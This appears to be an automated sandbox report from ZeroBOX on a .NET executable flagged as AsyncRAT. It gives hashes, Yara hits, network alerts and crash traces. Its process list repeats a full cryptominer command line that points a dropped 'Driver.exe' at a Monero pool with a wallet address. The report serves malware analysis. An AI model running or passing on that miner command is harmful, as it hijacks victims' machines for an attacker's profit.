Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 8, 2021, 12:20 p.m.	June 8, 2021, 12:24 p.m.

Size	4.3MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`e8a064a89592dd0838137155a048a5a3`
SHA256	`20613f93bfeefeeffaf00b4c71d7af583e26b88de43e8ec902d655e8700fadb5`
CRC32	`1365448D`
ssdeep	`98304:NNNaf55cH3Bj1JkxjOejrq8lVwOro1bbyOFb0hjB4+81TC:NNNa4HxDe/GDhFb0lB4+`
Yara	Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description) OS_Processor_Check_Zero - OS Processor Check IsPE32 - (no description)

Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
4964
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
3788
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
3436
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
1136
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
3636
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
4364
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
9072
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
9192
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
7592
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
2588
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
7052
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
4740
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
4716
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
1892
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
3404
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
7412
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
4568
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
8180
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
3092
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
7156
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
1852
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
5500
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
5480
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
9152
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 499DUXTsgeNCiUBBZxPZaYj1uiSCAcCF8jDmNXkX8nTUTuZ9xQrR8kLhk8sNCeU5VMKZtoeNpQncYfLLWt3zRxGy3uMQSMV -p x -k -v=0 --donate-level=1 -t 1
2032

Name	Response	Post-Analysis Lookup
edgedl.me.gvt1.com	A 34.104.35.123	34.104.35.123

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
34.104.35.123	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49809 -> 172.217.163.227:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.104.35.123:80 -> 192.168.56.102:49810	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 34.104.35.123:80 -> 192.168.56.102:49810	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 34.104.35.123:80 -> 192.168.56.102:49810	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.102:49809 172.217.163.227:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=upload.video.google.com	0c:b8:82:34:93:46:2b:86:b2:28:eb:7c:42:37:d1:9c:24:93:05:62

One or more processes crashed (24 events)

Time & API	Arguments	Status
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffdf000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffdf000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffd8000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffd8000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffdf000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffdf000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffd8000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffd8000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffdb000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffdb000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffda000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffda000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffdb000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffdb000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffd9000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffd9000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffdf000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffdf000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffd7000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffd7000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
__exception__ June 8, 2021, 12:21 p.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x77210895 stacktrace+0x84 memdup-0x1af @ 0x72e10470 hook_in_monitor+0x45 lde-0x133 @ 0x72e042ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x72e23603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd6e3243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd6e31fb driver+0x53a27b @ 0x93a27b GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0x83cfff @ 0xc3cfff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76e42ef0 driver+0xc3e000 @ 0x103e000 driver+0x1000 @ 0x401000 driver+0x833d42 @ 0xc33d42 0x7fffffd6000 driver+0xc3f2ca @ 0x103f2ca 0x7fffffd6000 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x77210895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 2291256 registers.rsi: 17031168 registers.r10: 0 registers.rbx: 1994665712 registers.rsp: 2293576 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 2292600 registers.r12: 0 registers.rbp: 0 registers.rdi: 4194671 registers.rax: 2290936 registers.r13: 0	1
